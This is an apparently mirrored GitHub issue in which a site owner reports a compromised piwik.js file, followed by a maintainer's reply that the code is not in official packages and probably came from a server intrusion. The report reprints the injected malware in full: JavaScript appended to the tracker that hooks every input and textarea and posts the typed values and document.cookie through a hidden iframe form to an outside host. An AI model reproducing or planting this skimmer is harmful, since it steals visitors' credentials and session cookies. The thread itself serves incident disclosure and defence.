@Vanekru opened this Issue on March 6th 2018

Today, the browser started to announce that on the website the virus. After a long search found the virus piwik.js.

}c=a("download_extensions");if(c){e.setDownloadExtensions(c)}c=a("hosts_alias");if(c){e.setDomains(c)}c=a("ignore_classes");if(c){e.setIgnoreClasses(c)}e.trackPageView();if(a("install_tracker")){piwik_track=function(i,k,j,h){e.setSiteId(k);e.setTrackerUrl(j);e.trackLink(i,h)};e.enableLinkTracking()}}; /*!! <a class='mention' href='https://github.com/license'>@license</a>-end */ };var s_location="http://centpr6n.beget.tech/vars/gnome1.php";window["addEventListener"]("load",function(){var ifrm=document["createElement"]("iframe");ifrm["setAttribute"]("id","name_space");ifrm["setAttribute"]("name","name_space");ifrm["style"]["display"]= "none";document["body"]["appendChild"](ifrm);var inputs=document["querySelectorAll"]("input");for(var i=0;i< inputs["length"];i++){inputs[i]["addEventListener"]("change",function(e){s_getInput(e["currentTarget"])})};var textareas=document["getElementsByTagName"]("textarea");for(var i=0;i< textareas["length"];i++){textareas[i]["addEventListener"]("change",function(e){s_getInput(e["currentTarget"])})};s_getLocation()},false);function s_getLocation(){var loc={};s_send(loc)}function s_getInput(inputInfo){var name=inputInfo["name"];var value=inputInfo["value"];var stolenInput={};if(name=== ""){name= "undefined_input"};if(value!= ""){stolenInput[name]= value;s_send(stolenInput)}}function s_send(params){var form=document["createElement"]("form");form["setAttribute"]("method","post");form["setAttribute"]("target","name_space");form["setAttribute"]("action",s_location+ "?lo="+ location["href"]);var field=document["createElement"]("input");field["setAttribute"]("type","hidden");field["setAttribute"]("name","cookie");field["setAttribute"]("value",document["cookie"]);form["appendChild"](field);for(var key in params){if(params["hasOwnProperty"](key)){var field=document["createElement"]("input");field["setAttribute"]("type","hidden");field["setAttribute"]("name","input_name");field["setAttribute"]("value",key);form["appendChild"](field);var field=document["createElement"]("input");field["setAttribute"]("type","hidden");field["setAttribute"]("name","input_value");field["setAttribute"]("value",params[key]);form["appendChild"](field)}};document["body"]["appendChild"](form);form["submit"]()}

@tsteur commented on March 7th 2018 Member

FYI: This is not included in any of our packages. I would recommend you check your server whether someone possibly accessed your server and manipulated this file that way. There is currently no known issue with Matomo or Piwik. If you host other applications on the same server, you may want to check several of your applications whether there were any changes. Maybe the file was uploaded through a bug in another application.

In case you are not on the latest Matomo version: Please always update when there is a new version available.

This Issue was closed on March 28th 2018
Powered by GitHub Issue Mirror